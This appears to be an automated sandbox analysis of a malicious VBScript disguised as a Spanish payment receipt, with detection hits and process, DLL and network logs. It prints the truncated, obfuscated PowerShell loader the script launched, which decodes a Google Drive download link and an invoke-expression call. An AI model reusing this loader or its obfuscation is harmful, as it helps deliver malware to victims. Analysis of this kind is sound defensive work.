Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1347362979.000001D9444F1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1347362979.000001D9444F1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1347362979.000001D94652E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.1347362979.000001D94652E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/uc?export=download&id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7DeP
Source: powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.google.com/download?id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De&export=download
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.google.comX1
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1347362979.000001D94587B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1370143781.000001D9546A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D946708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D946708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.com
Source: unknown; Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49705

System Summary

Source: amsi64_7420.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7420, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: C:\Windows\System32\wscript.exe; Process created: Commandline size = 7247
Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. 
A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNatur
Source: JUSTIFICANTE DE PAGO.vbsInitial sample: Strings found which are bigger than 50
Source: amsi64_7420.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7420, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winVBS@6/4@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Trangstilflde.Per
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cadvkh4.xq1.ps1
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: JUSTIFICANTE DE PAGO.vbsVirustotal: Detection: 9%
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. 
A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNatur
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trangstilflde.Per && echo $"
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: e.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C843000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1346871388.000001D942A24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbfYYo source: powershell.exe, 00000002.00000002.1393917309.000001D95C925000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C8A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C87F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb_4 source: powershell.exe, 00000002.00000002.1394575729.000001D95CB20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: t.Automation.pdb source: powershell.exe, 00000002.00000002.1346871388.000001D9429C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1394575729.000001D95CB20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32/ source: powershell.exe, 00000002.00000002.1394575729.000001D95CB8D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){", "0")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. 
A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturiHer enMontetDesmoesalatrTofro4Bo dg8u,sea=Vic.u$Ge erMUnciabDrvtylDon ee PutnmGlyc ePlat nskovttamalgsopvel.rabb.sAnac
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
